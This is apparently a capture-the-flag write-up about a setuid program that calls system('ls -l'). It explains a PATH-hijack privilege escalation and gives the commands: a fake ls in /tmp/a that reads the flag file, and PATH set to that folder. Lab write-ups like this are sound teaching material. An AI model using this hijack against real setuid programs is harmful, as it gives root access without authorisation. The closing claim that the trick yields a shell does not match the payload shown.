A simple privilege escalation, taking advantage of the PATH environment variable.
Overview
The challenge source code is just this little snippet:
int main() {
system("ls -l");
}
This simply lists the files in the current directory. Very importantly the program is running with setuid, meaning the executable runs as root even if a normal user runs it. But how can this harm anyone if it just lists a directory?
Solution
Well, the program will run the executable ls but how does it find it? It uses the PATH environment variable. That means that if we are able to point it to our ls it would just run our/ls and not /bin/ls!
The solution is something like this:
- Create a file named
lsin the/tmp/adirectory.mkdir /tmp/a touch /tmp/a/ls - Write in
/tmp/a/ls:/bin/cat $PWD/flag - And now if we just change the PATH environment variable to point to our
lswe get a shell!export PATH=/tmp/a ./vuln